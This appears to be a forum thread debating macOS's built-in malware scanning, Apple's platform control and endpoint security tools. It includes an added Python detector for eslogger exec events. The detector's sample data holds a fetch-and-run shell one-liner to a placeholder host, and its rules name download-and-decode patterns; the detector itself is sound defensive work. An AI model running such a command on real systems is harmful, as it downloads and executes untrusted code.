I think it’s interesting how long it took for the industry to accept that it’s really the OS’s responsibility to protect against malware and viruses.
It's not about "acceptance", unless it's about the increasing acceptance of authoritarianism --- because after all, it's really about control of the platform. They realised they could start calling everything they don't like "malware", that doing so would convince many if not all users, and thus found another way towards becoming the eventual arbiters of truth. Don't like something that your competitor does? Implement restrictions in the OS, and then when your competitor finds a way around that, start calling it "malware" and detecting and deleting it. We've already gotten disturbingly close to that reality:
Those of us who have been in this for a while may remember a time when a lot of Windows AVs would classify binaries compiled with GCC as suspicious or even quarantine/delete them, while those compiled with MSVC from the exact same source code were fine.
We know what things like this can and will be used for. AVs were in bed with antipiracy groups and Big Tech before it was even called Big Tech. We've seen past abuses of centralised power, and know that this is not going to end well.
You know “my platform, my rules” wouldn’t bother me so much if we didn’t go to a freemium model. Freemium is usually just the worst combination of commerce/ads there is. So suddenly I am no longer the client they are serving.
Macs are explicitly the opposite of a freemium model, though. The business model is such that the software is just a supporting element of the explicitly premium hardware.
That's right, and with the remote attestation capabilities of Secure Boot implementations, governments will finally be able to demand that every device sold has to be running an up-to-date version of an "approved" OS in order for ISPs to allow the device to access the internet.
The only limit is how incrementally they can introduce these rules so that the frog doesn't jump out of the boiling water. For example, the rules wouldn't initially apply to businesses, and maybe hobbyists would be allowed to use a special ISP that provides a custom CA certificate to do TLS interception.
I predict that within 5 years, a G7/EU/FVEY country will have passed a law that at least starts this process of making it illegal to run programs (or have VPN connections) that are blacklisted by the government. A major cyberattack (especially a false flag) will only speed up that timeline.
I think it was inevitable, because the OS features needed to implement virus scanning are indistinguishable from the features needed to hook malware into the OS (and apart from those technical details, most 3rd party antivirus solutions became actual malware over time, or at least actually increased the attack surface because of the shady shit they're doing).
What's funny though is that I always thought that Apple/macOS is doing things differently because they are a decade ahead of Microsoft when it comes to securing their OS, but it turns out that Apple is actually a decade behind (also see the Windows Vista style confirmation popups on recent macOS versions).
I'll add to this that as a long time Windows user, and occasional Mac OS (work related), I'd say Windows is a decade behind gnome.
How Windows still doesn't have good ways to record or capture the screen, or why moving and resizing windows still requires focus and skill, is beyond me. Also, different UIs from different generations, with partially overlapping features. Not to mention an internal key-value store that makes it impressive that it doesn't stop working suddenly more often than it does.
^ I thought this made it clear I was referring to Windows?
I honestly do not care about anything related to flame wars. Just that whenever I use Windows and want to do OS related things, it all feels clunky and annoying. It's not consistent. It's slow at start for no good reason (likely due to telemetry, or other online stuff). Updates are annoying and I'm glad I don't have to do anything professional on Windows. The Windows API is ugly. The only saving grace it has for technical productivity is WSL2. But, at that point, there is zero incentive to use something so clunky, when you can use linux/gnome and have a much, much, more enjoyable experience.
Again, everyone to each theirs. Ship buoyancy and all that.
edit:
Ah, I think I understand my misunderstanding. I wasn't commenting so much on the previous post about Windows vs MacOS. But adding that if something is a decade old compared to Windows, I consider windows to not have had any consistent improvements since Windows XP. Everything after that has been a mess. Some things better, but with a mix of old. "Need to fix something os-related", looks through new control panel. nope. looks through old control panel nope. Maybe it was in computer management?
I see. No worries :) My comment was intended as being somewhat relevant to, but not directly, to yours. The same way you related your windows vs mac experience, I related my gnome to windows.
> What's funny ... it turns out that Apple is actually a decade behind.
This is completely false.
A year before Microsoft released Defender in 2006, Apple had already packaged AV scanning in Mac OS X Tiger Server[1] in 2005. ClamAV[2] is OSS, and easily installed on the client OS, and many did so and had been since its first release in 2002.
The thing was, practically, there were no viruses on Mac OS X. The only reason Apple included ClamAV on the server was for scanning mail, because Mac OS X Server's mail server obviously also served Windows mail clients. IOW, Apple was fixing Microsoft's broken crap before Microsoft's own attempt to fix their broken crap.[3]
The very first Mac OS X virus appeared in 2006, called Leap-A. That was one in 2006, when Microsoft Windows already had tens of thousands in the wild. Following Leap-A were a few proofs of concept, and it seemed like every year, there would be one new virus, worm or Trojan horse identified on Mac. But infection was exceedingly rare, compared to Windows, where a new installation would be infected within 10 minutes of being connected to the Internet.
By the mid-2010s there were dozens of identified malware on Mac, but infection was still a very rare exception. Meanwhile, Windows had hundreds of thousands of malware by then, and it was nearly impossible to prevent infection even with vigilant virus scanning; malware got through ordinarily.
To this day, malware on macOS is pretty much a nonissue, and AV on Mac is only there primarily to prevent Windows machines on the same local network from being infected via Mac proxy. There has never been a widespread malware infection on Mac since Apple modernized their OS to BSD. Similarly, you never hear about malware on NetBSD, FreeBSD, or OpenBSD. There is good reason: unlike Windows, BSD is not fundamentally insecure. Malware developers go after the low hanging fruit, which is always pretty much only Microsoft Windows, and malware has plagued Microsoft's NT-based OS since inception.
[3] Had Microsoft Windows not been so dysfunctional, with Microsoft prone to actively breaking useful functionality in enterprise, Linux would never have become so popular. Linux's first best reason for existing was that Linux devs would quickly restore Windows' functionality within short order of Microsoft's removal of that functionality, within days or weeks. For years it was a cat and mouse game, with Linux's cat quickly catching Microsoft's mouse. This is how Linux got a foothold in the server room, which, as we know, exploded between 2011 and 2013 when Linux finally took over the datacenter.
Spybot has also been subsumed into some bloated "security center" type software. As far as I know there's nothing out there that does as efficient a job at hosts-level blocking as Spybot did back in the day.
I remember having to run a tool that deleted then replaced the winsock registry entries on the machine with the default ones from XP to fix infections. Even if you got the binary files with spybot you’d still have a broken winsock half the time.
Those were the days of the amazing Royale theme for XP… awesome theme.
I wonder how many learned how to remove malware and/or reinstall Windows too, thus gaining quite useful practical skills and becoming more comfortable with tinkering with the OS. I've read plenty of stories about kids accidentally doing so on their parents' computer, then while desperately attempting to fix their mistake, learned about such things as the registry (in particular, the location of autorun keys...), batch files, the command prompt, etc.
That's what I did, now shy of 20yrs later, I'm thankful for it as it was a great door to an ending era of computer fluency and troubleshooting/learning.
Nowadays, it's different. Less poking and prodding in an OS and that is sad.
Yep. About once a month after I broke something badly or got malware for the millionth time. Shoutout to my friend's dad who worked in IT and gave me their WinXP corporate serial number so I could reinstall without having to phone Microsoft! Still have it memorized to this day.
Is it? If this could be disabled, the performance would be so much better it could truly be called Windows 12. But now M$ forbids users from doing that without probably jumping through big hoops.
The industry is still pretending that it's actually app store platforms' responsibilities to protect against malware and viruses, as opposed to the operating system's responsibility.
The core function of trusted computing was to lockout malware, so it does make sense that this needs to be handled by the OS.
That said, and as many others have pointed out: with great power comes great responsibility.
There are definitely two sides to this. If we look at the iOS platform we have many developers who complain about the approval process, but we also have the platform with the least amount of malware by a significant margin despite the large/valuable install base. (1)
It’s also why I find it a bit crazy that the new EU rules will crack open a lot of that protection. They should have mandated for 3rd party approvals, not for a weaker anything-goes security model.
Installing apps from another AppStore on android is a somewhat more advanced concept. Enough that most people who think that computers are magic I know only use the official play store. To enable third party stores you have to explicitly enable it, and if you’re doing that you probably know what you’re doing.
Why can’t it be the same on iOS?
All I really need on the iPhone is something like newpipe and I’d be happy.
Apps can be side-loaded directly from websites. One doesn’t need another app store - the reason why competitor app stores fail is because they’re untrustworthy and crap. There isn’t a need for another app store if what one wants is already on the play store. The only secondary model that makes sense is direct downloads from websites, which unfortunately is also malware territory.
This is why the EU rules fall on their face: it’s all the security holes with none of the perceived advantages, only a few big names will make bank because they’re big and trusted enough to advertise directly to consumers.
As I said before, the EU should have just mandated that approvals are spun off to a 3rd party entity. That way it would solve the usual line of attack “apple didn’t approve my crashy spyware calculator app because they want to get rich on their own free calculator.”
Apple preventing “side-loading” is an essential part of controlling the platform, and it’s making them tons of money. Apple won't let go of that, at least not willingly.
Bringing free antivirus to Mac is a good thing IMO, especially since Microsoft has been doing the same for years.
I'd like to see much more behavioral analysis like the leading AV companies do, rather than just fingerprinting but it's a good start.
One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box. For me the user should always retain the last word. Until now most of their work has been in this direction (and the direction of iOS) but I'm pleased to see they're looking more into mitigation rather than just prevention now.
> One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box.
If we're talking about prevention of execution of unknown applications, that doesn't exist. Right click any application, click open, and it'll show you the same warning with "Open" added. So, you can always override Apple's warning.
I like how macOS makes you read the warning box before making a decision, tbh. Yes, it's no Linux in terms of flexibility, and freedom, but I like the OS nevertheless.
Windows is not at a different place. The boot chain is incrementally locked down. Also, due to unfettered access throughout Windows API, adding extra kernel modules was not widespread under Windows.
Just because you can modify Windows, it doesn't make it a better place overall. We have witnessed what happened to it over the years.
At the end of the day, I'm a Linux guy and strong GNU proponent. The reason I use Mac laptops is the hardware & software integration they provide, plus I always keep a virtualized Linux installation on top of it.
If macOS was not interoperable with Linux, I'd not be using it.
Windows also has a bunch of protections against modifying the kernel. Ironically this wasn't done to defend against malware but to defend against _antivirus vendors_ patching the kernel and making the system unstable.
People have been talking bs about Windows for a long time, but I think Apple will do even worse than what MS did to Windows. As something gets more popular (in this case, macOS), unfortunately it falls victim to corporate greed (telemetry, forced updates, etc.)
It depends on the profit motivators. Windows fell victim to telemetry and forced updates because Microsoft’s business model might not be what you think it is.
Apple has a simple business model for macOS. It exists solely as a vehicle for selling Macs - premium computers with (most importantly) a fat profit margin.
Keeping the customer wanting to buy new Macs (and maybe that new iPhone…and that Apple TV+ subscription…) is what drives their OS to be, generally, much less user-hostile than Windows. The user is the customer; whether through direct hardware sales or through the subscription purchases those hardware sales lead into.
Microsoft, in turn, sells Windows to OEMs and the business world via bulk licensing. You, the consumer, buying a Windows 11 license is not what’s funding Satya Nadella’s new private island. It’s Initech Corp. buying 5,000 PCs with Windows because “no one ever got fired for buying IBM.”
Disclaimer: this is largely all speculation, and if I am off the mark, do let me know.
First, Apple now has a vast ecosystem which they are trying to promote, be it music, movies, TV, advertising, some of it requiring or optimized for their hardware. It goes beyond selling Macs.
Second, Microsoft is also trying to sell PCs. I don't buy the idea that they can be explicitly anti-consumer and get away with it. Backlash against the OS would hurt MS's bottom line perhaps more than Apple.
> Second, Microsoft is also trying to sell PCs. I don't buy the idea that they can be explicitly anti-consumer and get away with it. Backlash against the OS would hurt MS's bottom line perhaps more than Apple.
Gmail wastes 10% of your mobile inbox screen real estate on a large bar at the bottom of the screen whose only function is to let you switch between email and their attempt at a Zoom competitor.
Macs are a small part of Apple's revenue. Apple is no longer in the computer/phone business. It is in an ecosystem business wherein it can keep on adding a deca-billion dollar vertical every few years.
The thing is, iOS's security and application model was like that since the beginning. Tech-minded people buying into Apple ecosystem knew these details from the get go. I personally accepted these terms before getting my iOS devices, for one.
It's not like the Android ecosystem, which started as an open source free for all mobile OS, which iteratively locked and closed down, starting from Google integration to OS and boot loader level.
Now, Google is preparing to throw the Linux kernel out of Android for an even more tightly controlled Fuchsia kernel. I'm hoarding my popcorn and waiting for the day when the hardware vendors stop building their Fuchsia drivers to control how they deprecate their hardware, and fine-tune their bottom lines.
The response from the community will be worth a watch.
Also, in pure irony, Apple is preparing to allow application sideloading.
> Also, in pure irony, Apple is preparing to allow application sideloading.
Only because the EU is preparing to force them. Apple is still very strongly against it. Recently they listed a bunch of reasons why they think it shouldn't exist.
But they know this is coming from the EU so they're probably trying to do it on their terms while they still can. Give as little as possible to the users to keep the EU off their back.
> One thing I don't like about Apple's approach to security is locking the user out, making the OS like a black box.
You can still turn off an awful lot of the security features in macOS. Some require a reboot, but still, the option's there for developers and power-users, if they prefer or require riskier operation.
Yes but that's all or nothing then. And you lose out on some functionality.
There is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
This is not OK, there should be a way for me to sign files so they are marked as valid.
I don't think the read-only OS partition or the SIP is a bad idea. The bad part is that Apple is the only one who controls it.
With all due respect, a person doesn't have to be that smart to cut and paste something from a Google search while not completely understanding the consequences.
> There is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
Does putting your custom options in something like:
/etc/ssh/sshd_config.d/disable-passwords.conf
no longer allow custom sshd config to survive updates? It's like if you're configuring daemons on, say, Ubuntu the "right way" so you don't get a ton of those prompts during apt-updates asking you if you want to accept the maintainer's config file or roll the dice and keep your own.
Good point, I have not tried that. Pretty sure when I still used macOS this didn't work. I think Mojave or Catalina was the last one. In the end I just had enough of macOS, this was only one of the many reasons. The lack of choice in UX configuration is another one.
Opinionated software is great if your opinion is aligned with the vendor's but Apple has been moving away from mine ever so slowly since peak macOS which was around Snow Leopard for me.
I really love how KDE gave me all the options back that I missed for so long. Finally virtual desktops in a grid again. And choosing what I want my UI to look like (and not forced changes on me every year)
The problem is that any way for you to sign files is also a way for malware to convince a less technically-adept user to sign it. Even if the dialogue that pops up for this says “Never ever do this unless you know exactly what you are doing, if a program you are running brought this up then it is probably trying to HACK you!”, people will click through it on autopilot and then maybe go ask what it meant afterwards.
I have a feeling it's not only that though. Apple is rapidly expanding from a hardware to a media content vendor and they have reasons to want to protect their own content as much as possible.
> There is no way for me to put my own configuration in the system and still have it persist. For example I change things in sshd_config (to turn off password auth), and PAM.
This is now possible for SSH, btw.
They finally support /etc/ssh/ssh[d]_config.d/ where you can add your customization files, and they won't be squashed by an OS update.
So they finally picked up on the technique Linux has been using forever.
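The two posts above (the sshd_config.d suggestion and the confirmation that macOS now supports it) both hinge on one rule of OpenSSH's configuration: the file is read top to bottom, each `Include` is expanded in place, and for most keywords the first value seen wins. A drop-in therefore only overrides the vendor file's setting when the `Include` line comes before that setting. The following is an added example written for this page, not code from the thread or from OpenSSH; it re-implements that rule in a simplified form (Match blocks are treated as the end of the global section) and builds a constructed sample tree in a temporary directory to show both outcomes.

```python
"""Added example: how sshd resolves a drop-in under sshd_config.d.

OpenSSH reads sshd_config top to bottom, expands each Include in place,
and for most keywords keeps the FIRST value it sees. So a drop-in only
overrides a setting in the vendor file when the Include line comes
before that setting. This is a simplified re-implementation of that
rule; Match blocks end the global section and are not modelled.
"""
import glob
import os
import re
import tempfile
from pathlib import Path

# "Keyword value" or "Keyword=value", both allowed by sshd_config(5).
_DIRECTIVE = re.compile(r"^(\S+?)\s*(?:=|\s)\s*(.*)$")


def effective_options(config_path, ssh_dir="/etc/ssh"):
    """Return {keyword_lower: first_value} for the global section of config_path."""
    opts = {}
    state = {"in_match": False}

    def walk(path):
        for raw in Path(path).read_text().splitlines():
            if state["in_match"]:
                return
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            m = _DIRECTIVE.match(line)
            if not m:
                continue
            key, value = m.group(1).lower(), m.group(2).strip()
            if key == "match":
                state["in_match"] = True          # end of the global section
                return
            if key == "include":
                for pattern in value.split():
                    if not os.path.isabs(pattern):           # relative to /etc/ssh
                        pattern = os.path.join(ssh_dir, pattern)
                    for inc in sorted(glob.glob(pattern)):   # glob(3) order is sorted
                        if os.path.isfile(inc):
                            walk(inc)
                continue
            opts.setdefault(key, value)                      # first value wins

    walk(config_path)
    return opts


def write_demo_tree(root, include_first):
    """Constructed sample tree (not a real macOS install): a vendor sshd_config
    plus the drop-in named in the thread, sshd_config.d/disable-passwords.conf."""
    dropin_dir = root / "sshd_config.d"
    dropin_dir.mkdir(parents=True, exist_ok=True)
    (dropin_dir / "disable-passwords.conf").write_text(
        "# local policy: key-based auth only; the vendor file is never edited\n"
        "PasswordAuthentication no\n"
        "KbdInteractiveAuthentication no\n"
    )
    include_line = f"Include {dropin_dir}/*\n"
    vendor_body = "PasswordAuthentication yes\nUsePAM yes\n"
    main = root / "sshd_config"
    main.write_text(include_line + vendor_body if include_first else vendor_body + include_line)
    return main


def demo(include_first):
    """Effective global options for one of the two possible Include positions."""
    with tempfile.TemporaryDirectory() as tmp:
        main = write_demo_tree(Path(tmp), include_first)
        return effective_options(main)


if __name__ == "__main__":
    print("Include at top    ->", demo(True)["passwordauthentication"])   # no: drop-in wins
    print("Include at bottom ->", demo(False)["passwordauthentication"])  # yes: vendor wins
```

On a real machine the authoritative check is `sudo sshd -T | grep -i passwordauthentication`, which prints the configuration sshd will actually use; if the drop-in value does not show up there, look at where the `Include` line sits in the vendor file.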
And this arrogant "we know better than you, plebes" is why I don't buy apple shit.
My money, my hardware, my control. Not negotiable.
(Edit: this applies to all their offerings. Iphone is already anti-user and effectively a rented device. Mac laptops are heading that way. Do not want.)
In their defense—both Apple's, and the public's—the general populace is, like, 99.99% OK with outsourcing those choices to a company that's way more interested/invested/capable in knowing better than they would be on their own.
Is it arrogant if the public continues to reward/reaffirm it?
> In their defense—both Apple's, and the public's—the general populace is, like, 99.99% OK
Majority of customers purchase one of two options in a duopoly isn’t really an endorsement of the options, but rather a critique on the lack of options.
Nonsense. At various points during iPhone's lifetime, customers had the ability to choose Windows Phone, Nokia, Symbian, Blackberry. People who wanted cheap or hackable phones went with Android, everyone else bought iPhones. Just like today!
Other operating systems were available in the past, and you can release a RISC-V Lisp OS phone incompatible with everything else tomorrow if you want. Just like in the past.
… however, the market decided years ago it didn't want to support a multitude of choices, when all other viable options went belly-up, or currently fail to get traction … or, to be fair, can't compete with the giant marketing machines of the remaining parties.
> the general populace is, like, 99.99% OK with outsourcing those choices
Because they were deliberately made to feel helpless.
> to a company that's way more interested/invested/capable in knowing better than they would be on their own.
The company is "way more interested" in continuing to squeeze the $$$ out of you, and would rather you not know anything but be subservient to it, because then you cannot object.
Is it, though? Or is it evidence that Apple's products win out on usability for the majority of use cases that are relevant to their customers? That is compared to Linux, where you have to make an active effort to achieve the same level of usability.
So you’re saying that you know better what most people want in a phone than they do?
I bet if you told 100 random people on the street what they could do with an Android phone that they couldn’t do with an iPhone, 99 of them would shrug and not care.
No the flip side is that I choose the product on the market that best meets my needs as do most people.
I started programming in assembly in 6th grade in 1986 and by the time I graduated from college in 1996, I had dabbled in assembly for four different processors (65C02, 68K, PPC, x86) and I have been a professional hands on keyboard developer since then [1]. I think I have a good grasp on how this computer stuff works. I still prefer the Apple ecosystem.
Have you thought that most people don’t care about the ability to run a Linux shell on their phone? I certainly don’t.
[1] before I get called out, I’ve mentioned before that my official title now is “cloud architect specialized in application modernization consulting”. But that just means that I’m still just an “full stack enterprise developer” who also writes a shit ton of yaml/HCL/PowerPoint slides, “one pagers” and PrFAQs.
Same here. I just finished reading Raymond Chen's The Old New Thing, and it was really reassuring to read about the choices the Windows developers would make to always give the user the final choice over the programs. Hopefully Microsoft still has devs like these working there on the OS now.
They give you pretty much all control of the hardware. The ultimate sign of that is that you can install Linux on the ARM Macs now. Apple even made some steps to make this reasonable. You do have full control of the hardware.
On the other side, a booted macOS has certain limitations in place. Not even root is able to write to certain partitions and such stuff. This is not because "we know better", but because these limits provide some fundamental security. A partition which cannot be written to, cannot be modified by malware.
You can boot into a mode where this protection does not exist, but for productive usage, it is a good idea to have that protection in place.
You can turn off most of the stuff that's keeping it out of "your control". I write "most" only to hedge—I'm not aware of any that you can't (though there may be some).
There's also the option of doing better things with your life and not worrying about what software your phone runs, in reality your life has to be really fucking boring for it to make any difference whatsoever.
A few years ago there was an advertising campaign run by Australia's massively dominant telco, Telstra. It went along the lines of a new business struggling to get their various comms setup via a number of smaller players, different ones per communications medium: Internet, landline, mobile. This faded to the advertising tagline of "Let's just get Telstra to do it": one-stop-shop for all your comms needs.
Having been responsible for WAN connectivity for a company with branches spread around Australia, I'm aware that the attitude of (added the first two words and comma for appropriate dramatic effect) "Fuck it, Let's just get Telstra to do it" will end up adding a good 30-40% of costs over and above alternate providers.
Moral of the story: The cost is worth it to some people, probably a majority of people because they just don't want to think about it, don't want to go to the extra effort, and probably won't realise the cost difference.
I'm not one of those people. I feel as if I'm quite "aware" of the nature of the world, and I react as per how I feel is appropriate. If that's "really fucking boring" to some internet rando, then, well, maybe I'd better re-think my entire life! Maybe I'll get Telstra to do it...
For that can't you use Private DNS / Encrypted DNS pointing to a PiHole or nextdns etc? My memory is that iOS you have to change the DNS settings for each network which is sort of a headache, but one-time at least.
that only works for network requests that use dns. some (including a number of apple & google services) go directly to an ip address, which is why a firewall like little snitch is still valuable beyond dns-based blockers like pihole, nextdns, and adguard (this is what i use on ios). you used to be able to install an application firewall on jailbroken iphones, but i don't think that's an option any more.
on macos, i used to use hands off! from one periodic (and before that, metakine), but they've since disappeared. i now use lulu with pf firewall via murus lite as a backup, but may switch to little snitch again (used to have a license but was unable to upgrade it so switched to hands off! via a promo) for the better UX.
No, the main issue is Apple considering themselves an unquestionably trusted party. Notarization and all other shit. I want to build a macOS app at some point because every single one of modern instant messaging clients sucks, but I won't be paying $100/year to be able to "notarize" it.
I had gatekeeper completely disabled, yet somehow it has recently reset to its asinine default and I got this "this app isn't from an identified developer, you should delete it" error. I hated it.
If you must do code signing for whatever reason, at least let me install my own roots of trust for developers I personally consider trustworthy.
Is there a way to disable the scanning that doesn't involve disabling SIP which prevents you from running iOS apps?
macOS really seems to try to frustrate power-users with these non-optional security features. I even had to make a separate note document with the commands/references to disable the various security features. I don't understand why they choose to frustrate this audience by making it so difficult.
Gatekeeper, AMFI, Quarantine, Library Validation and probably more (those are just the ones I have in my list of commands to disable).
I guess "non-optional" is inaccurate but every new macOS update I end up googling why some app can't open and discovering a new mechanism that I need to bypass (or a change to an existing one).
would you mind sharing some of that note you created? more insight and control over this part of the system is needed. I'll hunt for some apple docs, too.
Our business primarily uses macOS but we use Microsoft Defender ATP because we’re an Azure and Microsoft 365 house. The performance hit is absolutely insane but I’ve simply not had enough time to debug it and see if it can be tuned to something more reasonable.
Installing Homebrew is probably the biggest example, without Defender ATP, probably ~3 minutes. With Defender ATP, upwards of 15.
I’d love to convince the powers that be that XProtect is enough, but I’d need some way of measuring and auditing it. Any suggestions?
Defender ATP isn't really comparable to XProtect because it's providing your company with detailed logs of what's going on with the device - file operations, network connections, data about every program executed and the command line, and so on. That's why it slows down Homebrew so much, it's creating a ton of files every time you run it. Setting up exclusions for Homebrew's directories might help with performance, but I'd understand if they say no. Bad guys use Homebrew too.
It's extremely hard because you're essentially trying to use absence of proof as proof of absence. ("There is no malware, therefore the anti malware worked")
Even 'known' detections and preventions won't do it because you'd have to extrapolate if it wasn't detected, if prevention of anything was actually needed. Take a detection of an Excel v4 Macro loader, that's great to detect and prevent with ATP, but doesn't do anything on a Mac, and doesn't do anything on most PCs either.
This is similar to comparing Sophos vs. Trend Micro for example. The products do similar things, have similar goals and similar methods.
Ultimately the true protection doesn't lie in what AV you have or what EDR vendor you select, but how you deal with inevitable infections and loss of service. If you can treat the loss of a laptop (be it theft, fire or ransomware) the same way, regardless of the reason of loss, you're good. That also means encryption at rest and DLP at runtime. Neither are going to be in the AV vendor's product.
The same applies to malware ingress. If you have good controls on mail (even if just for attachment and BEC scams), that already saves you a ton of issues. And if you don't use filesystem shares like it's the 90's, that helps a ton as well, because now there is no OS-native spreading method using existing mounts.
The list goes on and on, and ultimately the whole AV vendor thing is just a tiny speck in the grand scheme. The biggest gap would be your audit capabilities, and having any controls vs. having no controls at all.
Something as simple as bare minimum hardening (FDE, MFA, autolock), OSQuery or Kolide for health/security posture checks, non-SMB/NFS file access, and proofpoint or mimecast in your mail flow will have a bigger impact on most corporate setups than any anti malware vendor can do.
Depending on the skill and education level of your users, you might even consider self-selection controls. Personally I use the Objective-See tools, XProtect and on-demand Sophos. The type of work I do doesn't fare well with traditional AV, but because I don't mind binary allowlisting, persistence lockout popups etc. and periodically confirming that I didn't miss anything using Sophos, I can get my work done and be secure enough at the same time. When I work at a regulated company I'll just use their supplied workstations and bill them extra by the hour.
Homebrew is abysmally slow as is. It is a shame it has the most packages as it is the worst package manager out of Windows, Linux and Mac now that winget is GA.
I've extensively used: apt/dpkg (Debian and Ubuntu), rpm (Mandrake, Red Hat, Fedora), portage (Gentoo), and MacPorts. I also have some experience with package management on Void, Arch, and FreeBSD. I wanna say I used some unofficial package manager on BeOS back in the day, too, and I'm pretty sure QNX had one though I don't remember much about those.
HomeBrew is my favorite of them, overall. Though Portage is pretty damn great, for what it is.
My current company is using Microsoft Defender ATP as a security measure too. Honestly by far the slowest MacBook I've ever used even though it's a 2018 model.
We collectively complained about it as it slows down our development process but it fell on deaf ears.
There are many ways to tune ATP, you should not be having 15 mins+ of lag to install homebrew. I erroneously see some orgs run full ATP + RegEx (DLP) and more on the same scan which can kill things tremendously alongside auto labeling.
this might be dumb, but why do we even use scanning in this day and age? Why not use kernel callbacks which notify when executables and files load for, say, the first time after being modified? Surely that'd be less race-y and waste less battery?
Totally, that's why Apple made Endpoint Security for security vendors. You can even pipe the events from the kernel with "sudo eslogger exec | jq" on the new macOS.
If you have XProtect active, it should step in if you try and open the EICAR file in a text editor. It may not if you try and “run” the file because it’s not an executable binary. Have you disabled Gatekeeper?
But this doesn't scan for zero-days, only for several major known malwares.
If you want to catch real zero-days, you have to approach things very differently. Do behavioral analytics, seeing what a process is up to and if it's poking into things it shouldn't.
Many leading AV suppliers like SentinelOne, Cylance, Crowdstrike do this and are very successful at it. However Apple is just starting in the antimalware market so I forgive them that they're just scanning for some known-bads for now.
I'm honestly not convinced any of these vendors are able to do anything about zero days either. They mostly seem to try and catch post exploitation and trying to detect "weird shit" happening post compromise (persistence, exfiltration, etc.). No AI/ML security product is going to stop someone from throwing a kernel exploit a disappearing into the night.
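The eslogger comment above and the behavioural-analytics discussion that follows it both come down to the same thing: once you have a process event stream, "scanning" turns into rules over what a process did rather than what its bytes look like. The block below is an added example, not Apple's or any vendor's code. It triages exec events in the newline-delimited JSON shape that `eslogger exec` prints; the exact field layout (`process.executable.path`, `event.exec.target`, `is_platform_binary`, `team_id`, `args`) and the string `event_type` value are assumptions modelled on that output, and the sample events are constructed, not captured.

```python
"""Triage eslogger-style exec events with a few behavioural rules.

Added example (not Apple's code). The JSON layout mirrors what
`eslogger exec` emits but is an assumption; real output uses a numeric
es_event_type_t for event_type, here replaced by the string "exec".
"""
import json

# User-writable locations that legitimate software almost never executes from.
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
STAGING_FRAGMENTS = ("/Downloads/", "/Library/Caches/")
SHELLS = {"sh", "bash", "zsh", "osascript", "python3"}
DOC_APPS = ("Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint", "Preview.app")

# Constructed sample: platform binary, macro-style shell spawn, unsigned
# binary run from Downloads, notarised third-party app (placeholder Team ID).
_SAMPLE_EVENTS = [
    {"event_type": "exec",
     "process": {"executable": {"path": "/bin/zsh"}, "is_platform_binary": True},
     "event": {"exec": {"target": {"executable": {"path": "/usr/bin/ls"}, "is_platform_binary": True,
                                   "signing_id": "com.apple.ls", "team_id": ""},
                        "args": ["ls", "-la"]}}},
    {"event_type": "exec",
     "process": {"executable": {"path": "/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel"},
                 "is_platform_binary": False},
     "event": {"exec": {"target": {"executable": {"path": "/bin/sh"}, "is_platform_binary": True,
                                   "signing_id": "com.apple.sh", "team_id": ""},
                        "args": ["sh", "-c", "curl -fsSL https://example.invalid/stage2 | sh"]}}},
    {"event_type": "exec",
     "process": {"executable": {"path": "/bin/zsh"}, "is_platform_binary": True},
     "event": {"exec": {"target": {"executable": {"path": "/Users/alice/Downloads/Installer/updater"},
                                   "is_platform_binary": False, "signing_id": "", "team_id": ""},
                        "args": ["updater"]}}},
    {"event_type": "exec",
     "process": {"executable": {"path": "/sbin/launchd"}, "is_platform_binary": True},
     "event": {"exec": {"target": {"executable": {"path": "/Applications/Slack.app/Contents/MacOS/Slack"},
                                   "is_platform_binary": False, "signing_id": "com.tinyspeck.slackmacgap",
                                   "team_id": "TEAMID0000"},  # placeholder, not a real Team ID
                        "args": ["Slack"]}}},
]
SAMPLE_NDJSON = "\n".join(json.dumps(e) for e in _SAMPLE_EVENTS)


def _basename(path):
    return path.rsplit("/", 1)[-1]


def exec_findings(ev):
    """Return the reasons one exec event is suspicious; empty list means unremarkable."""
    ex = ev["event"]["exec"]
    target = ex["target"]
    tpath = target["executable"]["path"]
    args = ex.get("args", [])
    parent = ev["process"]["executable"]["path"]
    reasons = []
    # Rule 1: not shipped by Apple and not signed with a Team ID (unsigned / ad hoc).
    if not target.get("is_platform_binary", False) and not target.get("team_id"):
        reasons.append("target is not a platform binary and carries no Team ID")
    # Rule 2: code executing out of a staging directory any user process can write.
    if tpath.startswith(STAGING_PREFIXES) or any(f in tpath for f in STAGING_FRAGMENTS):
        reasons.append("target lives in a user-writable staging directory")
    # Rule 3: shell -c one-liner that downloads or decodes a second stage.
    if _basename(tpath) in SHELLS and "-c" in args:
        script = " ".join(args[args.index("-c") + 1:])
        if any(tok in script for tok in ("curl ", "wget ", "base64 ")):
            reasons.append("shell -c one-liner with a download/decode stage")
    # Rule 4: a document-handling app spawning a shell (macro / exploit pattern).
    if any(app in parent for app in DOC_APPS) and _basename(tpath) in SHELLS:
        reasons.append("document-handling app spawned a shell")
    return reasons


def triage(events):
    """Return [(target path, [reasons])] for every exec event that trips a rule."""
    out = []
    for ev in events:
        if ev.get("event_type") != "exec":
            continue
        reasons = exec_findings(ev)
        if reasons:
            out.append((ev["event"]["exec"]["target"]["executable"]["path"], reasons))
    return out


def triage_ndjson(text):
    """Parse newline-delimited JSON (one event per line) and triage it."""
    return triage(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for path, reasons in triage_ndjson(SAMPLE_NDJSON):
        print(path)
        for r in reasons:
            print("  -", r)
```

On a real machine the input would be `sudo eslogger exec` piped into this script instead of the constructed sample; the rules are deliberately coarse and will produce false positives on developer workstations (Homebrew builds unsigned binaries in user-writable paths all day), which is exactly the tuning problem the thread complains about.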
Browsers can generate machine code and make it executable (for e.g. V8), and so can any other app. So they could download it and put it into newly allocated executable memory pages.
What do you mean by "passes"? Unless it's a file on a removable medium or a remote fs, it has to be created, which requires opening it. Scanning removable media upon insertion and remote fses upon mounting is going to look mighty suspicious and, in the latter case, be cover for data exfiltration.
I don’t use AV and I’ve never gotten a virus on my machine regardless of OS, except when I was 12 compiling virus code from the ezine 40Hex. I don’t run untrusted executables, seems simple to me. Then I see my non-technical friends and family with 90 icons on their desktop and 6 years of files in their Downloads folder and you see how it happens.
